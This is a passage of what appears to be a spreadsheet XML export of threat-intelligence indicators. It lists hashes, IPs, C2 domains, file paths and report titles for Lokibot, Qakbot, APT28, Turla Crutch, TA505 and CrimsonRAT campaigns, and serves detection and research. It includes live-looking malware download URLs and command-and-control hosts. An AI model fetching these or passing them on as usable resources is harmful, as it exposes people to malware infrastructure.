    <t>59dbf5984c48109a16de20656a3305269f4afa66e8864276e69d900d6cfe92c0</t>
  </si>
  <si>
    <t>5468b140b70a7c6566cc7bc60e11e32d0165015df59fc448588fa9f7c68a5c94</t>
  </si>
  <si>
    <t>82a13c434e21f40bf5f1e7e2694784e2152834c3c5e7188026efd4d698d63d8d</t>
  </si>
  <si>
    <t>2ce2651e7ea2ece2b45cadbf7ef916a998d14bbf3830631cf1de6c4c28a97d80</t>
  </si>
  <si>
    <t>ce65b98b78ee749c5db5cb678cb6a8f21f568446a9e7433f6cb3c2d648602512</t>
  </si>
  <si>
    <t>b76cc76001cb245697bab1d14b0b0a9c85dc0a034d70f70cc7b4a207124b932f</t>
  </si>
  <si>
    <t>c9ce209cbc4d3a733ed2dc6ff65318ab0d49506a9b406e8c11805b762c80d2b0</t>
  </si>
  <si>
    <t>1556826483</t>
  </si>
  <si>
    <t>https://blog.talosintelligence.com/2019/05/qakbot-levels-up-with-new-obfuscation.html</t>
  </si>
  <si>
    <t>1610265009</t>
  </si>
  <si>
    <t>1610265601</t>
  </si>
  <si>
    <t>https://blog.talosintelligence.com/2021/01/a-deep-dive-into-lokibot-infection-chain.html</t>
  </si>
  <si>
    <t>A Deep Dive into Lokibot Infection Chain</t>
  </si>
  <si>
    <t>1610265575</t>
  </si>
  <si>
    <t>d5a68a111c359a22965206e7ac7d602d92789dd1aa3f0e0c8d89412fc84e24a5</t>
  </si>
  <si>
    <t>First stage XLS file</t>
  </si>
  <si>
    <t>6b53ba14172f0094a00edfef96887aab01e8b1c49bdc6b1f34d7f2e32f88d172</t>
  </si>
  <si>
    <t>2nd stage packed downloader</t>
  </si>
  <si>
    <t>b36d914ae8e43c6001483dfc206b08dd1b0fbc5299082ea2fba154df35e7d649</t>
  </si>
  <si>
    <t>2nd stage unpacked DLL</t>
  </si>
  <si>
    <t>93ec3c23149c3d5245adf5d8a38c85e32cda24e23f8c4df2e19e1423739908b7</t>
  </si>
  <si>
    <t>3rd Stage DLL</t>
  </si>
  <si>
    <t>21e23350b05a4b84cdf5c93044d780558e6baf81b2148fdda4583930ab7cb836</t>
  </si>
  <si>
    <t>DLL used to bypass UAC</t>
  </si>
  <si>
    <t>c9038e31f798119d9e93e7eafbdd3e0f215e24ee2200fcd2a3ba460d549894ab</t>
  </si>
  <si>
    <t>Lokibot</t>
  </si>
  <si>
    <t>1610265597</t>
  </si>
  <si>
    <t>http://millsmiltinon.com/ojHYhkfkmofwendkfptktnbjgmfkgtdeitobregvdgetyhsk/Xehmigm.exe</t>
  </si>
  <si>
    <t>millsmiltinon.com</t>
  </si>
  <si>
    <t>104.223.143.132</t>
  </si>
  <si>
    <t>1456093396</t>
  </si>
  <si>
    <t>1466509560</t>
  </si>
  <si>
    <t>78450806e56b1f224d00455efcd04ce3</t>
  </si>
  <si>
    <t>APT28 Under the Scope - A Journey into Exfiltrating Intelligence and Government Information</t>
  </si>
  <si>
    <t>1466509541</t>
  </si>
  <si>
    <t>ore.net</t>
  </si>
  <si>
    <t>er.com</t>
  </si>
  <si>
    <t>1466509554</t>
  </si>
  <si>
    <t>vw.com</t>
  </si>
  <si>
    <t>1466509550</t>
  </si>
  <si>
    <t>ter.info</t>
  </si>
  <si>
    <t>1466509545</t>
  </si>
  <si>
    <t>te.info</t>
  </si>
  <si>
    <t>1466509502</t>
  </si>
  <si>
    <t>HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer</t>
  </si>
  <si>
    <t>1456093406</t>
  </si>
  <si>
    <t>075b6695ab63f36af65f7ffd45cccd39</t>
  </si>
  <si>
    <t>1456093407</t>
  </si>
  <si>
    <t>f3bf929a35c3f198226b88537d9ccb1a</t>
  </si>
  <si>
    <t>1456093408</t>
  </si>
  <si>
    <t>2683624eacc490238e98c449bddbb573</t>
  </si>
  <si>
    <t>1456093409</t>
  </si>
  <si>
    <t>5bf524a4860f3c33e3ad77b6b625db37</t>
  </si>
  <si>
    <t>1461963270</t>
  </si>
  <si>
    <t>1466510908</t>
  </si>
  <si>
    <t>0077182-9283764611.pdf.exe</t>
  </si>
  <si>
    <t>Phishing mail impersonating KPN</t>
  </si>
  <si>
    <t>1461963195</t>
  </si>
  <si>
    <t>zsn5qtrgfpu4tmpg.tor2web.fi</t>
  </si>
  <si>
    <t>194.150.168.74</t>
  </si>
  <si>
    <t>154.35.32.5</t>
  </si>
  <si>
    <t>86.59.21.38</t>
  </si>
  <si>
    <t>148.251.68.100</t>
  </si>
  <si>
    <t>188.165.26.13</t>
  </si>
  <si>
    <t>51.254.215.13</t>
  </si>
  <si>
    <t>163.172.7.30</t>
  </si>
  <si>
    <t>212.51.159.86</t>
  </si>
  <si>
    <t>5.135.159.110</t>
  </si>
  <si>
    <t>5.61.34.63</t>
  </si>
  <si>
    <t>5.175.233.86</t>
  </si>
  <si>
    <t>78.192.241.75</t>
  </si>
  <si>
    <t>212.51.128.44</t>
  </si>
  <si>
    <t>217.103.164.150</t>
  </si>
  <si>
    <t>62.210.206.25</t>
  </si>
  <si>
    <t>1461963196</t>
  </si>
  <si>
    <t>46.252.25.249</t>
  </si>
  <si>
    <t>37.230.119.37</t>
  </si>
  <si>
    <t>74.102.93.231</t>
  </si>
  <si>
    <t>89.163.235.163</t>
  </si>
  <si>
    <t>62.138.2.184</t>
  </si>
  <si>
    <t>80.198.105.184</t>
  </si>
  <si>
    <t>136.243.214.137</t>
  </si>
  <si>
    <t>217.79.179.177</t>
  </si>
  <si>
    <t>104.233.89.76</t>
  </si>
  <si>
    <t>198.27.119.92</t>
  </si>
  <si>
    <t>212.47.239.83</t>
  </si>
  <si>
    <t>78.85.219.41</t>
  </si>
  <si>
    <t>178.63.140.246</t>
  </si>
  <si>
    <t>213.136.81.89</t>
  </si>
  <si>
    <t>87.98.162.251</t>
  </si>
  <si>
    <t>80.100.250.244</t>
  </si>
  <si>
    <t>212.47.229.138</t>
  </si>
  <si>
    <t>163.172.133.36</t>
  </si>
  <si>
    <t>38.229.70.51</t>
  </si>
  <si>
    <t>51.255.198.77</t>
  </si>
  <si>
    <t>51.255.235.246</t>
  </si>
  <si>
    <t>217.160.126.50</t>
  </si>
  <si>
    <t>195.154.91.139</t>
  </si>
  <si>
    <t>18.181.5.37</t>
  </si>
  <si>
    <t>185.86.107.131</t>
  </si>
  <si>
    <t>64.237.51.46</t>
  </si>
  <si>
    <t>67.227.198.183</t>
  </si>
  <si>
    <t>193.11.164.243</t>
  </si>
  <si>
    <t>163.172.27.62</t>
  </si>
  <si>
    <t>188.40.51.232</t>
  </si>
  <si>
    <t>87.118.114.134</t>
  </si>
  <si>
    <t>85.214.151.72</t>
  </si>
  <si>
    <t>37.187.18.109</t>
  </si>
  <si>
    <t>38.229.70.61</t>
  </si>
  <si>
    <t>178.254.40.5</t>
  </si>
  <si>
    <t>144.2.118.84</t>
  </si>
  <si>
    <t>192.42.113.102</t>
  </si>
  <si>
    <t>77.66.12.185</t>
  </si>
  <si>
    <t>136.243.209.52</t>
  </si>
  <si>
    <t>178.62.199.226</t>
  </si>
  <si>
    <t>136.243.187.165</t>
  </si>
  <si>
    <t>149.202.49.87</t>
  </si>
  <si>
    <t>46.38.48.225</t>
  </si>
  <si>
    <t>83.162.202.182</t>
  </si>
  <si>
    <t>51.254.138.246</t>
  </si>
  <si>
    <t>178.254.2.89</t>
  </si>
  <si>
    <t>79.120.10.98</t>
  </si>
  <si>
    <t>81.28.197.126</t>
  </si>
  <si>
    <t>51.255.41.91</t>
  </si>
  <si>
    <t>146.71.104.123</t>
  </si>
  <si>
    <t>212.47.237.95</t>
  </si>
  <si>
    <t>95.211.216.9</t>
  </si>
  <si>
    <t>62.210.82.44</t>
  </si>
  <si>
    <t>176.9.50.119</t>
  </si>
  <si>
    <t>208.80.154.39</t>
  </si>
  <si>
    <t>195.154.251.25</t>
  </si>
  <si>
    <t>163.172.35.115</t>
  </si>
  <si>
    <t>46.28.207.19</t>
  </si>
  <si>
    <t>188.165.0.171</t>
  </si>
  <si>
    <t>212.51.156.173</t>
  </si>
  <si>
    <t>163.172.135.172</t>
  </si>
  <si>
    <t>188.166.37.108</t>
  </si>
  <si>
    <t>95.65.95.61</t>
  </si>
  <si>
    <t>46.4.0.156</t>
  </si>
  <si>
    <t>178.254.13.126</t>
  </si>
  <si>
    <t>145.220.0.15</t>
  </si>
  <si>
    <t>134.19.177.109</t>
  </si>
  <si>
    <t>217.12.210.207</t>
  </si>
  <si>
    <t>62.210.108.23</t>
  </si>
  <si>
    <t>188.166.35.67</t>
  </si>
  <si>
    <t>163.172.35.247</t>
  </si>
  <si>
    <t>178.62.93.36</t>
  </si>
  <si>
    <t>88.198.192.156</t>
  </si>
  <si>
    <t>80.90.56.144</t>
  </si>
  <si>
    <t>130.193.15.186</t>
  </si>
  <si>
    <t>185.100.84.175</t>
  </si>
  <si>
    <t>81.7.16.31</t>
  </si>
  <si>
    <t>178.32.44.157</t>
  </si>
  <si>
    <t>141.0.21.242</t>
  </si>
  <si>
    <t>5.104.106.38</t>
  </si>
  <si>
    <t>109.120.180.245</t>
  </si>
  <si>
    <t>62.210.138.3</t>
  </si>
  <si>
    <t>185.82.21.188</t>
  </si>
  <si>
    <t>213.163.70.234</t>
  </si>
  <si>
    <t>193.11.114.43</t>
  </si>
  <si>
    <t>46.101.9.51</t>
  </si>
  <si>
    <t>209.222.8.196</t>
  </si>
  <si>
    <t>62.113.216.173</t>
  </si>
  <si>
    <t>130.185.133.10</t>
  </si>
  <si>
    <t>217.12.210.214</t>
  </si>
  <si>
    <t>176.158.132.12</t>
  </si>
  <si>
    <t>195.154.164.243</t>
  </si>
  <si>
    <t>134.119.36.135</t>
  </si>
  <si>
    <t>38.229.79.2</t>
  </si>
  <si>
    <t>188.166.133.133</t>
  </si>
  <si>
    <t>185.60.146.221</t>
  </si>
  <si>
    <t>83.85.252.55</t>
  </si>
  <si>
    <t>62.210.92.11</t>
  </si>
  <si>
    <t>83.218.134.237</t>
  </si>
  <si>
    <t>89.163.209.233</t>
  </si>
  <si>
    <t>109.126.13.110</t>
  </si>
  <si>
    <t>46.101.220.161</t>
  </si>
  <si>
    <t>62.210.198.108</t>
  </si>
  <si>
    <t>213.239.216.222</t>
  </si>
  <si>
    <t>167.114.237.140</t>
  </si>
  <si>
    <t>46.23.70.195</t>
  </si>
  <si>
    <t>5.199.129.129</t>
  </si>
  <si>
    <t>151.236.14.149</t>
  </si>
  <si>
    <t>94.242.58.51</t>
  </si>
  <si>
    <t>192.87.28.82</t>
  </si>
  <si>
    <t>148.251.100.168</t>
  </si>
  <si>
    <t>195.154.73.212</t>
  </si>
  <si>
    <t>51.254.215.129</t>
  </si>
  <si>
    <t>192.42.116.161</t>
  </si>
  <si>
    <t>95.141.83.146</t>
  </si>
  <si>
    <t>148.251.190.229</t>
  </si>
  <si>
    <t>91.121.195.169</t>
  </si>
  <si>
    <t>188.226.200.216</t>
  </si>
  <si>
    <t>185.32.160.22</t>
  </si>
  <si>
    <t>188.40.109.146</t>
  </si>
  <si>
    <t>23.254.166.222</t>
  </si>
  <si>
    <t>62.210.124.124</t>
  </si>
  <si>
    <t>92.222.204.96</t>
  </si>
  <si>
    <t>212.129.42.9</t>
  </si>
  <si>
    <t>158.58.170.27</t>
  </si>
  <si>
    <t>82.223.21.74</t>
  </si>
  <si>
    <t>217.79.178.60</t>
  </si>
  <si>
    <t>109.104.12.92</t>
  </si>
  <si>
    <t>162.243.119.52</t>
  </si>
  <si>
    <t>81.173.240.81</t>
  </si>
  <si>
    <t>91.121.23.100</t>
  </si>
  <si>
    <t>195.154.42.18</t>
  </si>
  <si>
    <t>b4a012e465f845bc7ac8b441bec2d2c3</t>
  </si>
  <si>
    <t>1caec9a58834c35b283ee9e3f88d0637f1eb555e</t>
  </si>
  <si>
    <t>11040f2a5d5600c719340caef1e191e9bd86e7064013ed47e72dfadc83afd57a</t>
  </si>
  <si>
    <t>https://www.hybrid-analysis.com/sample/11040f2a5d5600c719340caef1e191e9bd86e7064013ed47e72dfadc83afd57a?environmentId=4</t>
  </si>
  <si>
    <t>1606775380</t>
  </si>
  <si>
    <t>1607011578</t>
  </si>
  <si>
    <t>a010d5449d29a1916827fdb443e3c84c405cb2a5</t>
  </si>
  <si>
    <t>Turla Crutch: Keeping the â€œback doorâ€ open</t>
  </si>
  <si>
    <t>2fabcf0fce7f733f45e73b432f413e564b92d651</t>
  </si>
  <si>
    <t>a4aff23b9a58b598524a71f09aa67994083a9c83</t>
  </si>
  <si>
    <t>778aa3a58f5c76e537b5fe287912cc53469a6078</t>
  </si>
  <si>
    <t>1606775405</t>
  </si>
  <si>
    <t>Win64/Agent.VX</t>
  </si>
  <si>
    <t>ESET detection name</t>
  </si>
  <si>
    <t>Win32/Agent.TQL</t>
  </si>
  <si>
    <t>Win32/Agent.SVE</t>
  </si>
  <si>
    <t>1606775434</t>
  </si>
  <si>
    <t>C:\Intel\outllib.dll</t>
  </si>
  <si>
    <t>C:\Intel\lang.nls</t>
  </si>
  <si>
    <t>C:\Intel\~intel_upd.exe</t>
  </si>
  <si>
    <t>C:\Intel\~csrss.exe</t>
  </si>
  <si>
    <t>%PROGRAMFILES%\(x86)\Google\Chrome\Application\dwmapi.dll</t>
  </si>
  <si>
    <t>%PROGRAMFILES%\(x86)\Mozilla Firefox\rasadhlp.dll</t>
  </si>
  <si>
    <t>%LOCALAPPDATA%\Microsoft\OneDrive\dwmapi.dll</t>
  </si>
  <si>
    <t>1606775462</t>
  </si>
  <si>
    <t>hotspot.accesscam.org</t>
  </si>
  <si>
    <t>Recovery C&amp;C</t>
  </si>
  <si>
    <t>highcolumn.webredirect.org</t>
  </si>
  <si>
    <t>ethdns.mywire.org</t>
  </si>
  <si>
    <t>theguardian.webredirect.org</t>
  </si>
  <si>
    <t>1606775493</t>
  </si>
  <si>
    <t>https://raw.githubusercontent.com/ksRD18pro/ksRD18/master/ntk.tmp</t>
  </si>
  <si>
    <t>1606834050</t>
  </si>
  <si>
    <t>https://www.welivesecurity.com/2020/12/02/turla-crutch-keeping-back-door-open</t>
  </si>
  <si>
    <t>ESET blogpost</t>
  </si>
  <si>
    <t>1663009377</t>
  </si>
  <si>
    <t>1685549782</t>
  </si>
  <si>
    <t>Huawey Coproration with love to USA</t>
  </si>
  <si>
    <t>TeslaGun panel</t>
  </si>
  <si>
    <t>TA505 Group’s TeslaGun In-Depth Analysis</t>
  </si>
  <si>
    <t>1663009451</t>
  </si>
  <si>
    <t>sep12.exe</t>
  </si>
  <si>
    <t>TA505 threat actors downloading and installing custom tools like (sep12.exe) via patched RDP sessions to carry out fraudulent activities.</t>
  </si>
  <si>
    <t>1663009877</t>
  </si>
  <si>
    <t>aasfhhvyyayssa.xyz</t>
  </si>
  <si>
    <t>IOC Domains</t>
  </si>
  <si>
    <t>aasouv636d.cn</t>
  </si>
  <si>
    <t>afggaiir3a.xyz</t>
  </si>
  <si>
    <t>aisiciciaisxuusuxic.xyz</t>
  </si>
  <si>
    <t>aonvjvisi3949vnao30cv.xyz</t>
  </si>
  <si>
    <t>aosdnvnauurt.xyz</t>
  </si>
  <si>
    <t>asdijoisad87ay3.cn</t>
  </si>
  <si>
    <t>asdyyauscuauusc.xyz</t>
  </si>
  <si>
    <t>asfggagsa3.xyz</t>
  </si>
  <si>
    <t>asfjjasguasus.xyz</t>
  </si>
  <si>
    <t>asfjjsdvv33gqrr2fv.cn</t>
  </si>
  <si>
    <t>asfpihbhbyd.xyz</t>
  </si>
  <si>
    <t>asfuuvhv3083f.xyz</t>
  </si>
  <si>
    <t>asgyyya6ychcha.xyz</t>
  </si>
  <si>
    <t>asudjasdusad.xyz</t>
  </si>
  <si>
    <t>dfsrakizimoy34ggf.xyz</t>
  </si>
  <si>
    <t>dkaknvizisic.xyz</t>
  </si>
  <si>
    <t>hitnaiguat.xyz</t>
  </si>
  <si>
    <t>listjhueaa.cn</t>
  </si>
  <si>
    <t>neboley.cn</t>
  </si>
  <si>
    <t>novacation.cn</t>
  </si>
  <si>
    <t>pgf5ga4g4b.cn</t>
  </si>
  <si>
    <t>pssoduvnzud.xyz</t>
  </si>
  <si>
    <t>sacmmvivuasd.xyz</t>
  </si>
  <si>
    <t>sadiviai9d9asd.xyz</t>
  </si>
  <si>
    <t>sagbbrrww2.cn</t>
  </si>
  <si>
    <t>sagiai3agar.cn</t>
  </si>
  <si>
    <t>saidifufaysydas.cn</t>
  </si>
  <si>
    <t>saidijfjv9as.xyz</t>
  </si>
  <si>
    <t>saidiviaiisj3.xyz</t>
  </si>
  <si>
    <t>sasdmvica883fen.xyz</t>
  </si>
  <si>
    <t>sasf6asf683jfsd.xyz</t>
  </si>
  <si>
    <t>saudjyyvv663.xyz</t>
  </si>
  <si>
    <t>sdgububue3.xyz</t>
  </si>
  <si>
    <t>soajfvhv235ua.xyz</t>
  </si>
  <si>
    <t>whereihjeu3.xyz</t>
  </si>
  <si>
    <t>teahgiaj3ig.cn</t>
  </si>
  <si>
    <t>1663009899</t>
  </si>
  <si>
    <t>755549aead02c8b524e31f9c511ca4395bdcae8c465e3298b90152ec8b8a6ae0</t>
  </si>
  <si>
    <t>HRDP Tool</t>
  </si>
  <si>
    <t>bromide.xyz</t>
  </si>
  <si>
    <t>1663009942</t>
  </si>
  <si>
    <t>a1219acec7d8b85c7b4626536074eeff8db803b50f60e6f87eaa4289b9e4d326</t>
  </si>
  <si>
    <t>ServHelper</t>
  </si>
  <si>
    <t>1b3740d9a8511ddfdb657cd796c7bd0adb49bf8f63490df0248ff07d19cd4294</t>
  </si>
  <si>
    <t>da012f669961c3631b10dd147f38ca34796c40692e01b51dd206f6a5b755e605</t>
  </si>
  <si>
    <t>d7ef71aa67e1fb5a364c97ff4b89f5f6a28db1c84f91563547a4e44581833486</t>
  </si>
  <si>
    <t>4ff1dae2285660a46c356a8e836879adc2999f2044a26d17ac4ce5f9e1b442a3</t>
  </si>
  <si>
    <t>f771432c3652882bb0a7ddf235648c606f713f6f5baf610358784ffb84be8119</t>
  </si>
  <si>
    <t>13520de2d217cc8b84b80c9ddf7d63173cb086ef731aecf305aef8cc1822bf7d</t>
  </si>
  <si>
    <t>f62434d2bfd1b9d953618d0be4ba442e3210b821575ae1b1c97ae6aa55ae394a</t>
  </si>
  <si>
    <t>86e2c0d8edca2f757546e0a39ad127a765baadd1bdfd4684989c2f48e91191af</t>
  </si>
  <si>
    <t>1663009943</t>
  </si>
  <si>
    <t>345c8cfc9b89b30c742e78d7d57b706a2964d5be97fa95b69f2f3eb58d32db63</t>
  </si>
  <si>
    <t>7d2e5d0e384590ef4f759d93c19400f2914247774ae95c79f24051f3d2a3008e</t>
  </si>
  <si>
    <t>1445bf709e6a8d940bad6be531c783b2429132b61998d5797ea818847efa1d7b</t>
  </si>
  <si>
    <t>5c9d696efa6dc5c89e8aa672cbd94d871876ef7aeb0f59a641ac13db7764363e</t>
  </si>
  <si>
    <t>8c3488033b80790744702061432620884547c91ea3c4862acb220625eba77024</t>
  </si>
  <si>
    <t>b075e0ab2910952131b06aee792fed4c97bcdc7f5817112f3035308cd4636c4c</t>
  </si>
  <si>
    <t>02dcc8523e47914f0ff7f9eb632c0f317960271b4f5161b27e09937deef83b07</t>
  </si>
  <si>
    <t>87c765c5fce805243bb8c87424235b4fc08fdf0f47517a302dc40583632904d0</t>
  </si>
  <si>
    <t>97c3090d1be0ac549a065eb7346cbe5052d7c10040f6d44e3cd082f84ded618e</t>
  </si>
  <si>
    <t>9bb4fdc2f141a11fa7ea8a6e1a6754593d1e85ae29d64d46d72fc8da1dae3bb1</t>
  </si>
  <si>
    <t>25b987d4f4017e0e97c4b81eeab59c4fcf7832dc48a8e7f12ae5184ccc229937</t>
  </si>
  <si>
    <t>151f8b796850f46dc292cd7153a68cc7efe4dd694e2164087b42023b4dacc8c3</t>
  </si>
  <si>
    <t>ceeebe176e8e2d2eccbcb66aa2dd78acbd461d912123114d33526089ae7f2e6f</t>
  </si>
  <si>
    <t>d541b9ff1fd68818abd9d0f70966e97beaab82dd6bb32d66566fbd6d657fbfd8</t>
  </si>
  <si>
    <t>6f76d29b00e83d8fef479e9e261e4fe8f98db387c15d8d8bfebbe03b898c0131</t>
  </si>
  <si>
    <t>64cb280711db0137dc6da7f2cd71745f94ada56d890c6326f07f1b36eee36e07</t>
  </si>
  <si>
    <t>b32f96217e69b983264075a884c789bbb59b04995f5468c2c6a54d9385d13a80</t>
  </si>
  <si>
    <t>b2c81b6b95ad45e343ad9376c11c9243f810bd99bb3b8d140eaa4ae2f2444f8c</t>
  </si>
  <si>
    <t>e04abdb57ce06940bdbac3b5c6a99a7e52e6c315dd97e3da045d570871e7900b</t>
  </si>
  <si>
    <t>d62856d3faa446b2b0305691aa0a1cb4d03c12e24a6581285a25b15e10b5cc67</t>
  </si>
  <si>
    <t>3c441477158518c9994e3b42f49278cb0e4f048fcc2648f21f0816cf77187445</t>
  </si>
  <si>
    <t>a09dcec94458d1970ded54ec374167cd227fea6ff4b56effa1755926d7bd5f41</t>
  </si>
  <si>
    <t>282e8186cec5ec821d89c7347f508aca3eb1e5c532200d50550e75972e5c33c8</t>
  </si>
  <si>
    <t>59562b8cc45655a72f7b54e1de28c5585d1d6ccf2963b73d8737ecc2387aeb1b</t>
  </si>
  <si>
    <t>f0a360fac55b952594568dadd94d7a60d575893fa9258314f098a9e98df45bae</t>
  </si>
  <si>
    <t>cc28e327610e9deb6551c99a32a44fec86220f2840276474ded747580af850d3</t>
  </si>
  <si>
    <t>3db7b97aa0bff0fdde441f01d62d0504c33088314472a3cbbd6bc684dd04697b</t>
  </si>
  <si>
    <t>1557c247f197086be4a5076f89b88357a9a5ecb7dbb3de2d0cf63eda57a24d7a</t>
  </si>
  <si>
    <t>6839de9e0b5882b0e6668bc5e68b23923be40efaf2bd3606caf71f66aaf01478</t>
  </si>
  <si>
    <t>f3b0f09bea01f4577516594f646ab3c05f5829aafad7e42370ed97ac95b5df58</t>
  </si>
  <si>
    <t>6377077d1743520bec5e8c287d56e6f443cb40201450252a880d5fee7271b151</t>
  </si>
  <si>
    <t>b5e776f84f8f01fcc1fb822ff5612afe62097bf367ced2187fda0b5bf3d652ee</t>
  </si>
  <si>
    <t>5911ad0a2f2f76cbe6e83b58b95ac820aee88b7fb37e017275bd3984b3b92bfa</t>
  </si>
  <si>
    <t>fc3c17833725d727590ef00fdf3f8d70f52d4c13a9cf52a77b6e74e22d7dae61</t>
  </si>
  <si>
    <t>046f08e500cc9156c4af47a73744ccb060606c77d7a8beb5677aa6ff4d256211</t>
  </si>
  <si>
    <t>0d8119421ceeffeab9c6bbb649eb52e8d6f0fb049fa0293166af3d65cfa1489e</t>
  </si>
  <si>
    <t>7fae4ffb43200001f2f16a6a2b23a507370fb692c8fa659d3c335fb7a4002277</t>
  </si>
  <si>
    <t>c7cb1cc9a2148e8db293de61d791cbbe7202eda89335c93caf454028a61d0a90</t>
  </si>
  <si>
    <t>353a484824356a70e6d08c5cf637228d2788364199c1bb4b3feca28783378f74</t>
  </si>
  <si>
    <t>2fd386c26b8a516a4cd864d59df2c74321f3e0436ca4e876a42c4e34f56ae074</t>
  </si>
  <si>
    <t>08a75beea96e15a6bc2e838cf0649ef0e3be100b819d4513b816778f18903c12</t>
  </si>
  <si>
    <t>60fc94385520b4353ddc0d9fda9698f4f61ff74abaf794525b9828f8bc24ed0a</t>
  </si>
  <si>
    <t>c2e0d82381c56792d5dc7d3288bbeb68b53c8d6bfad4c22f33bab9ad5bb848e0</t>
  </si>
  <si>
    <t>8190afb8cbe829cdf4aca9351e5a772e228a4afcd9f04c55f2e3cd23a2d185ab</t>
  </si>
  <si>
    <t>a14ccd32d63e5ae6638980c12aaec19aeb86646ac5fc3d0f8fc9042ce11e48af</t>
  </si>
  <si>
    <t>d8ebd1d13056d7ae44d84ddcf7df37b79940a89918aa7871f36241de65c624ad</t>
  </si>
  <si>
    <t>3ebf679771812224bfa18e2736116a8e5d811191e0ef5c9639fa853032d52cc0</t>
  </si>
  <si>
    <t>a2b0ef2413399dbdb01de3a0d2dd310ba127bbfdad09352fecb8444d88a05662</t>
  </si>
  <si>
    <t>ed29d4ab1988cb5066a313d0d0b08459899ecbd827df42d4e171bad0f3717448</t>
  </si>
  <si>
    <t>26235babec09882e22c83a2862221c670dd1ca690a76cf1c313842a0c8ae4af3</t>
  </si>
  <si>
    <t>216f34056b57137d69073604206e30a606188c6c42bdd24d08643266cd631e2a</t>
  </si>
  <si>
    <t>6a68a6a3ccb8db1621e0655385c566969ff356b5fa6da357d9d098788a32cfa5</t>
  </si>
  <si>
    <t>9ec2cdb88e31593abc176a5b11c7993d3039444f9dcfd607c1bf1bcc9db939b3</t>
  </si>
  <si>
    <t>4ff9ad975fec22dd387c910dc163a2cfe3fffe7152b6f97d597ccb936caaab99</t>
  </si>
  <si>
    <t>11327ae9126f1e924e43dbb06a5e3d158d4d980472f0f2f30f9f73443913776d</t>
  </si>
  <si>
    <t>7af3f4589a0d13da9f6f09244cd02fca406632e55a02648371978b047bf3647b</t>
  </si>
  <si>
    <t>5cabe27ecb16899c66c118077e9574191d29671c8136a8274addf6fa1cd103c7</t>
  </si>
  <si>
    <t>64f1a2f9b95a39c04b60062a24a7bc6de038f706cd679df7b1346c34c055e0b1</t>
  </si>
  <si>
    <t>0bc24531345dd120b7242992dd2a00429c62535adfd8f69041431ac9ae13793d</t>
  </si>
  <si>
    <t>c0516809e105193c11ac5913c57c3aacfbfaa98e046bdd8ab9f71c1d555f0534</t>
  </si>
  <si>
    <t>6e43a01b09534fe3932ebc9d0ea950baeb28bf00cd157b618c8ec4ba6f346c66</t>
  </si>
  <si>
    <t>9530ff957cd2b657cf8ee3b315636b6ef6124ecc785e9b769618043ed5c561bb</t>
  </si>
  <si>
    <t>7a58242ae37aab93f74185733ffd30425ca9d2451c83655aa2c07c09b5f40f90</t>
  </si>
  <si>
    <t>7ed9b5536d19ad840881d068719dbc95da230bf00ba647bf1340bc5666daf2c7</t>
  </si>
  <si>
    <t>00a8e4ff48e955d37146ea6994812b3bdfecdff356d5fcdd1b23e5aedfb39604</t>
  </si>
  <si>
    <t>7f6e55013ecda2d56a70b135b412943aec62ba6bf314356b7c518215ce1d7d15</t>
  </si>
  <si>
    <t>5fd42aaad58f4a1377fd528dbe6010b014b2e922243942ed00df9a8ed7ed33b9</t>
  </si>
  <si>
    <t>9c1643a07c97b89e8b9fbdf0ea661f98549cfaca9478d1b87ae52eee79e06567</t>
  </si>
  <si>
    <t>f78d5aecc88c20ad1121ce0b504eb8de51e461e1b3820db07577906649841bdc</t>
  </si>
  <si>
    <t>1663009960</t>
  </si>
  <si>
    <t>37.1.201.136</t>
  </si>
  <si>
    <t>RDP/Proxy Servers</t>
  </si>
  <si>
    <t>5.61.60.54</t>
  </si>
  <si>
    <t>23.227.194.159</t>
  </si>
  <si>
    <t>1663009983</t>
  </si>
  <si>
    <t>185.163.45.186</t>
  </si>
  <si>
    <t>Management Panels</t>
  </si>
  <si>
    <t>185.163.45.240</t>
  </si>
  <si>
    <t>185.163.45.248</t>
  </si>
  <si>
    <t>185.163.45.56</t>
  </si>
  <si>
    <t>185.163.47.171</t>
  </si>
  <si>
    <t>185.163.47.210</t>
  </si>
  <si>
    <t>194.180.174.20</t>
  </si>
  <si>
    <t>194.180.174.56</t>
  </si>
  <si>
    <t>206.188.197.203</t>
  </si>
  <si>
    <t>206.188.197.221</t>
  </si>
  <si>
    <t>5.181.156.142</t>
  </si>
  <si>
    <t>5.181.156.15</t>
  </si>
  <si>
    <t>5.181.156.4</t>
  </si>
  <si>
    <t>5.181.156.64</t>
  </si>
  <si>
    <t>94.158.245.113</t>
  </si>
  <si>
    <t>94.158.245.172</t>
  </si>
  <si>
    <t>94.158.245.180</t>
  </si>
  <si>
    <t>94.158.245.73</t>
  </si>
  <si>
    <t>94.158.245.77</t>
  </si>
  <si>
    <t>1663009999</t>
  </si>
  <si>
    <t>https://www.prodaft.com/resource/detail/ta505-ta505-groups-tesla-gun-depth-analysis</t>
  </si>
  <si>
    <t>1644251620</t>
  </si>
  <si>
    <t>1644252214</t>
  </si>
  <si>
    <t>dlrarhsiva.exe</t>
  </si>
  <si>
    <t>Investigating APT36 or Earth Karkaddan’s Attack Chain and Malware Arsenal</t>
  </si>
  <si>
    <t>1644251640</t>
  </si>
  <si>
    <t>1More-details.doc</t>
  </si>
  <si>
    <t>1644251654</t>
  </si>
  <si>
    <t>sharingmymedia.com</t>
  </si>
  <si>
    <t>1644251675</t>
  </si>
  <si>
    <t>d9979a41027fe790399edebe5ef8765f61e1eb1a4ee1d11690b4c2a0aa38ae42</t>
  </si>
  <si>
    <t>1644251693</t>
  </si>
  <si>
    <t>viral91.xyz</t>
  </si>
  <si>
    <t>1644251710</t>
  </si>
  <si>
    <t>209.127.19.241|10284</t>
  </si>
  <si>
    <t>1644251954</t>
  </si>
  <si>
    <t>0335de8eadbbd5dc7cbe92ef869bcea6f6596ac39a38680142c982ec6e97ecde</t>
  </si>
  <si>
    <t>CrimsonRAT SHA-256 TROJ_FRS.0NA103EE21</t>
  </si>
  <si>
    <t>1b36599fe98c0fa9a417d4c8527eb3b2a6b83c39e79096c3ba7cca258e986f94</t>
  </si>
  <si>
    <t>CrimsonRAT SHA-256 - Backdoor.MSIL.CRIMSONRAT.L</t>
  </si>
  <si>
    <t>8cb542f5793279b8a11af28e9352f41d400856a28e40ed1daa323b47f9ea3e3c</t>
  </si>
  <si>
    <t>CrimsonRAT SHA-256 - AndroidOS_MobileSpy.NGPA</t>
  </si>
  <si>
    <t>87f51b4632c5fbc351a59a234dfefef506d807f2c173aac23162b85d0d73c2ad</t>
  </si>
  <si>
